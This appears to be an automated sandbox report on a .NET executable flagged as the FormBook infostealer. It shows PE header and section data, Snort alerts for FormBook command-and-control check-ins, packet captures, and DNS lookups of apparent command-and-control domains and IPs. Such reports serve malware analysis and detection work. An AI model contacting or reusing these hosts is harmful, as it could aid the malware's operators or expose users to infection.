                                                                      Image File Characteristics:LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED
                                                                      DLL Characteristics:NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
                                                                      Time Stamp:0x60985B9D [Sun May 9 22:01:01 2021 UTC]
                                                                      TLS Callbacks:
                                                                      CLR (.Net) Version:v4.0.30319
                                                                      OS Version Major:4
                                                                      OS Version Minor:0
                                                                      File Version Major:4
                                                                      File Version Minor:0
                                                                      Subsystem Version Major:4
                                                                      Subsystem Version Minor:0
                                                                      Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                                                      Entrypoint Preview

                                                                      Instruction
                                                                      jmp dword ptr [00402000h]
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al

                                                                      Data Directories

                                                                      NameVirtual AddressVirtual Size Is in Section
                                                                      IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                      IMAGE_DIRECTORY_ENTRY_IMPORT0xa49740x57.text
                                                                      IMAGE_DIRECTORY_ENTRY_RESOURCE0xa80000x10e58.rsrc
                                                                      IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                      IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                      IMAGE_DIRECTORY_ENTRY_BASERELOC0xa60000xc.reloc
                                                                      IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                      IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                      IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                      IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                      IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                      IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                      IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                                                      IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                      IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                                                      IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                      Sections

                                                                      NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                      .text0x20000xa29d40xa2a00False0.848016549769data7.76742936293IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                                                      .reloc0xa60000xc0x200False0.044921875data0.101910425663IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                                      .rsrc0xa80000x10e580x11000False0.243049172794data4.11172065775IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

                                                                      Resources

                                                                      NameRVASizeTypeLanguageCountry
                                                                      RT_ICON0xa81300x10828dBase IV DBT, blocks size 0, block length 2048, next free block index 40, next free block 0, next used block 0
                                                                      RT_GROUP_ICON0xb89580x14data
                                                                      RT_VERSION0xb896c0x338data
                                                                      RT_MANIFEST0xb8ca40x1b4XML 1.0 document, UTF-8 Unicode (with BOM) text, with very long lines, with no line terminators

                                                                      Imports

                                                                      DLLImport
                                                                      mscoree.dll_CorExeMain

                                                                      Version Infos

                                                                      DescriptionData
                                                                      Translation0x0000 0x04b0
                                                                      LegalCopyrightCopyright MCS 2018
                                                                      Assembly Version1.0.0.0
                                                                      InternalNameDispIdAttribute.exe
                                                                      FileVersion1.0.0.0
                                                                      CompanyNameMCS
                                                                      LegalTrademarks
                                                                      Comments
                                                                      ProductNameLibrary
                                                                      ProductVersion1.0.0.0
                                                                      FileDescriptionLibrary
                                                                      OriginalFilenameDispIdAttribute.exe

                                                                      Network Behavior

                                                                      Snort IDS Alerts

                                                                      TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                                                      05/12/21-10:51:18.705997TCP2031453ET TROJAN FormBook CnC Checkin (GET)4972180192.168.2.434.102.136.180
                                                                      05/12/21-10:51:18.705997TCP2031449ET TROJAN FormBook CnC Checkin (GET)4972180192.168.2.434.102.136.180
                                                                      05/12/21-10:51:18.705997TCP2031412ET TROJAN FormBook CnC Checkin (GET)4972180192.168.2.434.102.136.180
                                                                      05/12/21-10:51:18.844483TCP1201ATTACK-RESPONSES 403 Forbidden804972134.102.136.180192.168.2.4
                                                                      05/12/21-10:51:29.565347TCP1201ATTACK-RESPONSES 403 Forbidden804972334.102.136.180192.168.2.4
                                                                      05/12/21-10:51:34.680214TCP2031453ET TROJAN FormBook CnC Checkin (GET)4972480192.168.2.434.102.136.180
                                                                      05/12/21-10:51:34.680214TCP2031449ET TROJAN FormBook CnC Checkin (GET)4972480192.168.2.434.102.136.180
                                                                      05/12/21-10:51:34.680214TCP2031412ET TROJAN FormBook CnC Checkin (GET)4972480192.168.2.434.102.136.180
                                                                      05/12/21-10:51:34.817345TCP1201ATTACK-RESPONSES 403 Forbidden804972434.102.136.180192.168.2.4
                                                                      05/12/21-10:51:47.347272TCP2031453ET TROJAN FormBook CnC Checkin (GET)4972680192.168.2.4104.164.26.246
                                                                      05/12/21-10:51:47.347272TCP2031449ET TROJAN FormBook CnC Checkin (GET)4972680192.168.2.4104.164.26.246
                                                                      05/12/21-10:51:47.347272TCP2031412ET TROJAN FormBook CnC Checkin (GET)4972680192.168.2.4104.164.26.246
                                                                      05/12/21-10:52:09.098131TCP2031453ET TROJAN FormBook CnC Checkin (GET)4972880192.168.2.418.219.49.238
                                                                      05/12/21-10:52:09.098131TCP2031449ET TROJAN FormBook CnC Checkin (GET)4972880192.168.2.418.219.49.238
                                                                      05/12/21-10:52:09.098131TCP2031412ET TROJAN FormBook CnC Checkin (GET)4972880192.168.2.418.219.49.238
                                                                      05/12/21-10:52:14.662301TCP2031453ET TROJAN FormBook CnC Checkin (GET)4972980192.168.2.4162.241.62.63
                                                                      05/12/21-10:52:14.662301TCP2031449ET TROJAN FormBook CnC Checkin (GET)4972980192.168.2.4162.241.62.63
                                                                      05/12/21-10:52:14.662301TCP2031412ET TROJAN FormBook CnC Checkin (GET)4972980192.168.2.4162.241.62.63
                                                                      05/12/21-10:52:20.083382TCP1201ATTACK-RESPONSES 403 Forbidden804973034.102.136.180192.168.2.4

                                                                      Network Port Distribution

                                                                      TCP Packets

                                                                      TimestampSource PortDest PortSource IPDest IP
                                                                      May 12, 2021 10:51:18.664244890 CEST4972180192.168.2.434.102.136.180
                                                                      May 12, 2021 10:51:18.705457926 CEST804972134.102.136.180192.168.2.4
                                                                      May 12, 2021 10:51:18.705667019 CEST4972180192.168.2.434.102.136.180
                                                                      May 12, 2021 10:51:18.705996990 CEST4972180192.168.2.434.102.136.180
                                                                      May 12, 2021 10:51:18.748567104 CEST804972134.102.136.180192.168.2.4
                                                                      May 12, 2021 10:51:18.844482899 CEST804972134.102.136.180192.168.2.4
                                                                      May 12, 2021 10:51:18.844995975 CEST4972180192.168.2.434.102.136.180
                                                                      May 12, 2021 10:51:18.845154047 CEST804972134.102.136.180192.168.2.4
                                                                      May 12, 2021 10:51:18.845277071 CEST4972180192.168.2.434.102.136.180
                                                                      May 12, 2021 10:51:18.886292934 CEST804972134.102.136.180192.168.2.4
                                                                      May 12, 2021 10:51:24.035094023 CEST4972280192.168.2.466.96.162.130
                                                                      May 12, 2021 10:51:24.162120104 CEST804972266.96.162.130192.168.2.4
                                                                      May 12, 2021 10:51:24.162272930 CEST4972280192.168.2.466.96.162.130
                                                                      May 12, 2021 10:51:24.162463903 CEST4972280192.168.2.466.96.162.130
                                                                      May 12, 2021 10:51:24.290806055 CEST804972266.96.162.130192.168.2.4
                                                                      May 12, 2021 10:51:24.313256979 CEST804972266.96.162.130192.168.2.4
                                                                      May 12, 2021 10:51:24.313348055 CEST804972266.96.162.130192.168.2.4
                                                                      May 12, 2021 10:51:24.313710928 CEST4972280192.168.2.466.96.162.130
                                                                      May 12, 2021 10:51:24.313878059 CEST4972280192.168.2.466.96.162.130
                                                                      May 12, 2021 10:51:24.441024065 CEST804972266.96.162.130192.168.2.4
                                                                      May 12, 2021 10:51:29.385797977 CEST4972380192.168.2.434.102.136.180
                                                                      May 12, 2021 10:51:29.426841021 CEST804972334.102.136.180192.168.2.4
                                                                      May 12, 2021 10:51:29.426979065 CEST4972380192.168.2.434.102.136.180
                                                                      May 12, 2021 10:51:29.427136898 CEST4972380192.168.2.434.102.136.180
                                                                      May 12, 2021 10:51:29.469638109 CEST804972334.102.136.180192.168.2.4
                                                                      May 12, 2021 10:51:29.565346956 CEST804972334.102.136.180192.168.2.4
                                                                      May 12, 2021 10:51:29.565373898 CEST804972334.102.136.180192.168.2.4
                                                                      May 12, 2021 10:51:29.565687895 CEST4972380192.168.2.434.102.136.180
                                                                      May 12, 2021 10:51:29.565812111 CEST4972380192.168.2.434.102.136.180
                                                                      May 12, 2021 10:51:29.606769085 CEST804972334.102.136.180192.168.2.4
                                                                      May 12, 2021 10:51:34.638822079 CEST4972480192.168.2.434.102.136.180
                                                                      May 12, 2021 10:51:34.679857016 CEST804972434.102.136.180192.168.2.4
                                                                      May 12, 2021 10:51:34.679977894 CEST4972480192.168.2.434.102.136.180
                                                                      May 12, 2021 10:51:34.680213928 CEST4972480192.168.2.434.102.136.180
                                                                      May 12, 2021 10:51:34.724829912 CEST804972434.102.136.180192.168.2.4
                                                                      May 12, 2021 10:51:34.817344904 CEST804972434.102.136.180192.168.2.4
                                                                      May 12, 2021 10:51:34.817398071 CEST804972434.102.136.180192.168.2.4
                                                                      May 12, 2021 10:51:34.817590952 CEST4972480192.168.2.434.102.136.180
                                                                      May 12, 2021 10:51:34.817627907 CEST4972480192.168.2.434.102.136.180
                                                                      May 12, 2021 10:51:34.861659050 CEST804972434.102.136.180192.168.2.4
                                                                      May 12, 2021 10:51:40.080795050 CEST4972580192.168.2.4107.164.93.172
                                                                      May 12, 2021 10:51:40.272236109 CEST8049725107.164.93.172192.168.2.4
                                                                      May 12, 2021 10:51:40.272469044 CEST4972580192.168.2.4107.164.93.172
                                                                      May 12, 2021 10:51:41.394385099 CEST4972580192.168.2.4107.164.93.172
                                                                      May 12, 2021 10:51:41.585478067 CEST8049725107.164.93.172192.168.2.4
                                                                      May 12, 2021 10:51:41.920188904 CEST4972580192.168.2.4107.164.93.172
                                                                      May 12, 2021 10:51:42.150350094 CEST8049725107.164.93.172192.168.2.4
                                                                      May 12, 2021 10:51:43.344671011 CEST8049725107.164.93.172192.168.2.4
                                                                      May 12, 2021 10:51:43.344873905 CEST4972580192.168.2.4107.164.93.172
                                                                      May 12, 2021 10:51:47.151396990 CEST4972680192.168.2.4104.164.26.246
                                                                      May 12, 2021 10:51:47.346937895 CEST8049726104.164.26.246192.168.2.4
                                                                      May 12, 2021 10:51:47.347071886 CEST4972680192.168.2.4104.164.26.246
                                                                      May 12, 2021 10:51:47.347271919 CEST4972680192.168.2.4104.164.26.246
                                                                      May 12, 2021 10:51:47.739093065 CEST8049726104.164.26.246192.168.2.4
                                                                      May 12, 2021 10:51:47.849630117 CEST4972680192.168.2.4104.164.26.246
                                                                      May 12, 2021 10:51:47.953749895 CEST8049726104.164.26.246192.168.2.4
                                                                      May 12, 2021 10:51:47.953820944 CEST4972680192.168.2.4104.164.26.246
                                                                      May 12, 2021 10:51:48.043176889 CEST8049726104.164.26.246192.168.2.4
                                                                      May 12, 2021 10:51:48.043261051 CEST4972680192.168.2.4104.164.26.246
                                                                      May 12, 2021 10:51:58.117974997 CEST4972780192.168.2.4198.54.117.216
                                                                      May 12, 2021 10:51:58.312294960 CEST8049727198.54.117.216192.168.2.4
                                                                      May 12, 2021 10:51:58.312581062 CEST4972780192.168.2.4198.54.117.216
                                                                      May 12, 2021 10:51:58.312855959 CEST4972780192.168.2.4198.54.117.216
                                                                      May 12, 2021 10:51:58.507247925 CEST8049727198.54.117.216192.168.2.4
                                                                      May 12, 2021 10:51:58.507266998 CEST8049727198.54.117.216192.168.2.4
                                                                      May 12, 2021 10:52:08.960374117 CEST4972880192.168.2.418.219.49.238
                                                                      May 12, 2021 10:52:09.097378016 CEST804972818.219.49.238192.168.2.4
                                                                      May 12, 2021 10:52:09.097668886 CEST4972880192.168.2.418.219.49.238
                                                                      May 12, 2021 10:52:09.098130941 CEST4972880192.168.2.418.219.49.238
                                                                      May 12, 2021 10:52:09.267746925 CEST804972818.219.49.238192.168.2.4
                                                                      May 12, 2021 10:52:09.267822027 CEST804972818.219.49.238192.168.2.4
                                                                      May 12, 2021 10:52:09.268290043 CEST4972880192.168.2.418.219.49.238
                                                                      May 12, 2021 10:52:09.268402100 CEST4972880192.168.2.418.219.49.238
                                                                      May 12, 2021 10:52:09.405317068 CEST804972818.219.49.238192.168.2.4
                                                                      May 12, 2021 10:52:14.497379065 CEST4972980192.168.2.4162.241.62.63
                                                                      May 12, 2021 10:52:14.658348083 CEST8049729162.241.62.63192.168.2.4
                                                                      May 12, 2021 10:52:14.662015915 CEST4972980192.168.2.4162.241.62.63
                                                                      May 12, 2021 10:52:14.662301064 CEST4972980192.168.2.4162.241.62.63
                                                                      May 12, 2021 10:52:14.824084997 CEST8049729162.241.62.63192.168.2.4
                                                                      May 12, 2021 10:52:14.828128099 CEST8049729162.241.62.63192.168.2.4
                                                                      May 12, 2021 10:52:14.828155041 CEST8049729162.241.62.63192.168.2.4
                                                                      May 12, 2021 10:52:14.828591108 CEST4972980192.168.2.4162.241.62.63
                                                                      May 12, 2021 10:52:14.829040051 CEST4972980192.168.2.4162.241.62.63
                                                                      May 12, 2021 10:52:14.991287947 CEST8049729162.241.62.63192.168.2.4
                                                                      May 12, 2021 10:52:19.905034065 CEST4973080192.168.2.434.102.136.180
                                                                      May 12, 2021 10:52:19.946204901 CEST804973034.102.136.180192.168.2.4
                                                                      May 12, 2021 10:52:19.946568966 CEST4973080192.168.2.434.102.136.180
                                                                      May 12, 2021 10:52:19.946628094 CEST4973080192.168.2.434.102.136.180
                                                                      May 12, 2021 10:52:19.987349987 CEST804973034.102.136.180192.168.2.4
                                                                      May 12, 2021 10:52:20.083381891 CEST804973034.102.136.180192.168.2.4
                                                                      May 12, 2021 10:52:20.083417892 CEST804973034.102.136.180192.168.2.4
                                                                      May 12, 2021 10:52:20.083604097 CEST4973080192.168.2.434.102.136.180
                                                                      May 12, 2021 10:52:20.083626986 CEST4973080192.168.2.434.102.136.180
                                                                      May 12, 2021 10:52:20.124206066 CEST804973034.102.136.180192.168.2.4

                                                                      UDP Packets

                                                                      TimestampSource PortDest PortSource IPDest IP
                                                                      May 12, 2021 10:50:06.187598944 CEST5648353192.168.2.48.8.8.8
                                                                      May 12, 2021 10:50:06.236371040 CEST53564838.8.8.8192.168.2.4
                                                                      May 12, 2021 10:50:07.473145962 CEST5102553192.168.2.48.8.8.8
                                                                      May 12, 2021 10:50:07.522317886 CEST53510258.8.8.8192.168.2.4
                                                                      May 12, 2021 10:50:10.386281967 CEST6151653192.168.2.48.8.8.8
                                                                      May 12, 2021 10:50:10.435064077 CEST53615168.8.8.8192.168.2.4
                                                                      May 12, 2021 10:50:12.766177893 CEST4918253192.168.2.48.8.8.8
                                                                      May 12, 2021 10:50:12.814867020 CEST53491828.8.8.8192.168.2.4
                                                                      May 12, 2021 10:50:13.783512115 CEST5992053192.168.2.48.8.8.8
                                                                      May 12, 2021 10:50:13.832799911 CEST53599208.8.8.8192.168.2.4
                                                                      May 12, 2021 10:50:14.972019911 CEST5745853192.168.2.48.8.8.8
                                                                      May 12, 2021 10:50:15.020659924 CEST53574588.8.8.8192.168.2.4
                                                                      May 12, 2021 10:50:18.660664082 CEST5057953192.168.2.48.8.8.8
                                                                      May 12, 2021 10:50:18.709949017 CEST53505798.8.8.8192.168.2.4
                                                                      May 12, 2021 10:50:20.651276112 CEST5170353192.168.2.48.8.8.8
                                                                      May 12, 2021 10:50:20.700069904 CEST53517038.8.8.8192.168.2.4
                                                                      May 12, 2021 10:50:37.368491888 CEST6524853192.168.2.48.8.8.8
                                                                      May 12, 2021 10:50:37.420420885 CEST53652488.8.8.8192.168.2.4
                                                                      May 12, 2021 10:50:38.520031929 CEST5372353192.168.2.48.8.8.8
                                                                      May 12, 2021 10:50:38.573285103 CEST53537238.8.8.8192.168.2.4
                                                                      May 12, 2021 10:50:39.452804089 CEST6464653192.168.2.48.8.8.8
                                                                      May 12, 2021 10:50:39.504393101 CEST53646468.8.8.8192.168.2.4
                                                                      May 12, 2021 10:50:43.248534918 CEST6529853192.168.2.48.8.8.8
                                                                      May 12, 2021 10:50:43.297564983 CEST53652988.8.8.8192.168.2.4
                                                                      May 12, 2021 10:50:45.461976051 CEST5912353192.168.2.48.8.8.8
                                                                      May 12, 2021 10:50:45.515486956 CEST53591238.8.8.8192.168.2.4
                                                                      May 12, 2021 10:50:46.388328075 CEST5453153192.168.2.48.8.8.8
                                                                      May 12, 2021 10:50:46.436871052 CEST53545318.8.8.8192.168.2.4
                                                                      May 12, 2021 10:50:56.997181892 CEST4971453192.168.2.48.8.8.8
                                                                      May 12, 2021 10:50:57.047228098 CEST53497148.8.8.8192.168.2.4
                                                                      May 12, 2021 10:50:57.931051970 CEST5802853192.168.2.48.8.8.8
                                                                      May 12, 2021 10:50:57.981679916 CEST53580288.8.8.8192.168.2.4
                                                                      May 12, 2021 10:50:59.369159937 CEST5309753192.168.2.48.8.8.8
                                                                      May 12, 2021 10:50:59.417979002 CEST53530978.8.8.8192.168.2.4
                                                                      May 12, 2021 10:51:00.356456041 CEST4925753192.168.2.48.8.8.8
                                                                      May 12, 2021 10:51:00.408096075 CEST53492578.8.8.8192.168.2.4
                                                                      May 12, 2021 10:51:07.619672060 CEST6238953192.168.2.48.8.8.8
                                                                      May 12, 2021 10:51:07.677623987 CEST53623898.8.8.8192.168.2.4
                                                                      May 12, 2021 10:51:12.696763039 CEST4991053192.168.2.48.8.8.8
                                                                      May 12, 2021 10:51:13.572402000 CEST53499108.8.8.8192.168.2.4
                                                                      May 12, 2021 10:51:18.585570097 CEST5585453192.168.2.48.8.8.8
                                                                      May 12, 2021 10:51:18.654793024 CEST53558548.8.8.8192.168.2.4
                                                                      May 12, 2021 10:51:23.881491899 CEST6454953192.168.2.48.8.8.8
                                                                      May 12, 2021 10:51:24.033982992 CEST53645498.8.8.8192.168.2.4
                                                                      May 12, 2021 10:51:29.321614027 CEST6315353192.168.2.48.8.8.8
                                                                      May 12, 2021 10:51:29.383584023 CEST53631538.8.8.8192.168.2.4
                                                                      May 12, 2021 10:51:34.574343920 CEST5299153192.168.2.48.8.8.8
                                                                      May 12, 2021 10:51:34.637315035 CEST53529918.8.8.8192.168.2.4
                                                                      May 12, 2021 10:51:39.858114958 CEST5370053192.168.2.48.8.8.8
                                                                      May 12, 2021 10:51:40.059561968 CEST53537008.8.8.8192.168.2.4
                                                                      May 12, 2021 10:51:46.934683084 CEST5172653192.168.2.48.8.8.8
                                                                      May 12, 2021 10:51:47.149091959 CEST53517268.8.8.8192.168.2.4
                                                                      May 12, 2021 10:51:52.870204926 CEST5679453192.168.2.48.8.8.8
                                                                      May 12, 2021 10:51:53.016850948 CEST53567948.8.8.8192.168.2.4
                                                                      May 12, 2021 10:51:58.051847935 CEST5653453192.168.2.48.8.8.8
                                                                      May 12, 2021 10:51:58.115525007 CEST53565348.8.8.8192.168.2.4
                                                                      May 12, 2021 10:52:08.547878981 CEST5662753192.168.2.48.8.8.8
                                                                      May 12, 2021 10:52:08.957885027 CEST53566278.8.8.8192.168.2.4
                                                                      May 12, 2021 10:52:14.309987068 CEST5662153192.168.2.48.8.8.8
                                                                      May 12, 2021 10:52:14.496155024 CEST53566218.8.8.8192.168.2.4
                                                                      May 12, 2021 10:52:19.838093996 CEST6311653192.168.2.48.8.8.8
                                                                      May 12, 2021 10:52:19.904480934 CEST53631168.8.8.8192.168.2.4

                                                                      DNS Queries

                                                                      TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                                      May 12, 2021 10:51:07.619672060 CEST192.168.2.48.8.8.80x590fStandard query (0)www.paperplaneexplorer.comA (IP address)IN (0x0001)
                                                                      May 12, 2021 10:51:12.696763039 CEST192.168.2.48.8.8.80xee68Standard query (0)www.xn--80aasvjfhla.xn--p1acfA (IP address)IN (0x0001)
                                                                      May 12, 2021 10:51:18.585570097 CEST192.168.2.48.8.8.80xf953Standard query (0)www.comicstattoosnguns.comA (IP address)IN (0x0001)
                                                                      May 12, 2021 10:51:23.881491899 CEST192.168.2.48.8.8.80x32baStandard query (0)www.goeseo.comA (IP address)IN (0x0001)
                                                                      May 12, 2021 10:51:29.321614027 CEST192.168.2.48.8.8.80x21aeStandard query (0)www.shadyshainarae.comA (IP address)IN (0x0001)
                                                                      May 12, 2021 10:51:34.574343920 CEST192.168.2.48.8.8.80x71fbStandard query (0)www.thefrankversion.comA (IP address)IN (0x0001)
                                                                      May 12, 2021 10:51:39.858114958 CEST192.168.2.48.8.8.80xd9e3Standard query (0)www.tjanyancha.comA (IP address)IN (0x0001)
                                                                      May 12, 2021 10:51:46.934683084 CEST192.168.2.48.8.8.80xbd5fStandard query (0)www.dmowang.comA (IP address)IN (0x0001)
                                                                      May 12, 2021 10:51:52.870204926 CEST192.168.2.48.8.8.80xff09Standard query (0)www.usapersonalshopper.comA (IP address)IN (0x0001)
                                                                      May 12, 2021 10:51:58.051847935 CEST192.168.2.48.8.8.80x879aStandard query (0)www.pocopage.comA (IP address)IN (0x0001)
                                                                      May 12, 2021 10:52:08.547878981 CEST192.168.2.48.8.8.80xccfbStandard query (0)www.goodcreditcardshome.infoA (IP address)IN (0x0001)
                                                                      May 12, 2021 10:52:14.309987068 CEST192.168.2.48.8.8.80x8eb7Standard query (0)www.pasteleriaruth.comA (IP address)IN (0x0001)
                                                                      May 12, 2021 10:52:19.838093996 CEST192.168.2.48.8.8.80x2f41Standard query (0)www.amesshop.comA (IP address)IN (0x0001)

                                                                      DNS Answers

                                                                      TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                                      May 12, 2021 10:51:07.677623987 CEST8.8.8.8192.168.2.40x590fName error (3)www.paperplaneexplorer.comnonenoneA (IP address)IN (0x0001)
                                                                      May 12, 2021 10:51:13.572402000 CEST8.8.8.8192.168.2.40xee68Server failure (2)www.xn--80aasvjfhla.xn--p1acfnonenoneA (IP address)IN (0x0001)
                                                                      May 12, 2021 10:51:18.654793024 CEST8.8.8.8192.168.2.40xf953No error (0)www.comicstattoosnguns.comcomicstattoosnguns.comCNAME (Canonical name)IN (0x0001)
                                                                      May 12, 2021 10:51:18.654793024 CEST8.8.8.8192.168.2.40xf953No error (0)comicstattoosnguns.com34.102.136.180A (IP address)IN (0x0001)
                                                                      May 12, 2021 10:51:24.033982992 CEST8.8.8.8192.168.2.40x32baNo error (0)www.goeseo.com66.96.162.130A (IP address)IN (0x0001)
                                                                      May 12, 2021 10:51:29.383584023 CEST8.8.8.8192.168.2.40x21aeNo error (0)www.shadyshainarae.comshadyshainarae.comCNAME (Canonical name)IN (0x0001)
                                                                      May 12, 2021 10:51:29.383584023 CEST8.8.8.8192.168.2.40x21aeNo error (0)shadyshainarae.com34.102.136.180A (IP address)IN (0x0001)
                                                                      May 12, 2021 10:51:34.637315035 CEST8.8.8.8192.168.2.40x71fbNo error (0)www.thefrankversion.comthefrankversion.comCNAME (Canonical name)IN (0x0001)
                                                                      May 12, 2021 10:51:34.637315035 CEST8.8.8.8192.168.2.40x71fbNo error (0)thefrankversion.com34.102.136.180A (IP address)IN (0x0001)
                                                                      May 12, 2021 10:51:40.059561968 CEST8.8.8.8192.168.2.40xd9e3No error (0)www.tjanyancha.com107.164.93.172A (IP address)IN (0x0001)
                                                                      May 12, 2021 10:51:47.149091959 CEST8.8.8.8192.168.2.40xbd5fNo error (0)www.dmowang.com104.164.26.246A (IP address)IN (0x0001)
                                                                      May 12, 2021 10:51:53.016850948 CEST8.8.8.8192.168.2.40xff09Name error (3)www.usapersonalshopper.comnonenoneA (IP address)IN (0x0001)
                                                                      May 12, 2021 10:51:58.115525007 CEST8.8.8.8192.168.2.40x879aNo error (0)www.pocopage.comparkingpage.namecheap.comCNAME (Canonical name)IN (0x0001)
                                                                      May 12, 2021 10:51:58.115525007 CEST8.8.8.8192.168.2.40x879aNo error (0)parkingpage.namecheap.com198.54.117.216A (IP address)IN (0x0001)
                                                                      May 12, 2021 10:51:58.115525007 CEST8.8.8.8192.168.2.40x879aNo error (0)parkingpage.namecheap.com198.54.117.210A (IP address)IN (0x0001)
                                                                      May 12, 2021 10:51:58.115525007 CEST8.8.8.8192.168.2.40x879aNo error (0)parkingpage.namecheap.com198.54.117.218A (IP address)IN (0x0001)
                                                                      May 12, 2021 10:51:58.115525007 CEST8.8.8.8192.168.2.40x879aNo error (0)parkingpage.namecheap.com198.54.117.215A (IP address)IN (0x0001)
                                                                      May 12, 2021 10:51:58.115525007 CEST8.8.8.8192.168.2.40x879aNo error (0)parkingpage.namecheap.com198.54.117.211A (IP address)IN (0x0001)
                                                                      May 12, 2021 10:51:58.115525007 CEST8.8.8.8192.168.2.40x879aNo error (0)parkingpage.namecheap.com198.54.117.212A (IP address)IN (0x0001)
                                                                      May 12, 2021 10:51:58.115525007 CEST8.8.8.8192.168.2.40x879aNo error (0)parkingpage.namecheap.com198.54.117.217A (IP address)IN (0x0001)
                                                                      May 12, 2021 10:52:08.957885027 CEST8.8.8.8192.168.2.40xccfbNo error (0)www.goodcreditcardshome.info18.219.49.238A (IP address)IN (0x0001)
                                                                      May 12, 2021 10:52:08.957885027 CEST8.8.8.8192.168.2.40xccfbNo error (0)www.goodcreditcardshome.info18.218.104.7A (IP address)IN (0x0001)
                                                                      May 12, 2021 10:52:14.496155024 CEST8.8.8.8192.168.2.40x8eb7No error (0)www.pasteleriaruth.compasteleriaruth.comCNAME (Canonical name)IN (0x0001)
                                                                      May 12, 2021 10:52:14.496155024 CEST8.8.8.8192.168.2.40x8eb7No error (0)pasteleriaruth.com162.241.62.63A (IP address)IN (0x0001)
                                                                      May 12, 2021 10:52:19.904480934 CEST8.8.8.8192.168.2.40x2f41No error (0)www.amesshop.comamesshop.comCNAME (Canonical name)IN (0x0001)
                                                                      May 12, 2021 10:52:19.904480934 CEST8.8.8.8192.168.2.40x2f41No error (0)amesshop.com34.102.136.180A (IP address)IN (0x0001)

                                                                      HTTP Request Dependency Graph

                                                                      • www.comicstattoosnguns.com
                                                                      • www.goeseo.com
                                                                      • www.shadyshainarae.com
                                                                      • www.thefrankversion.com
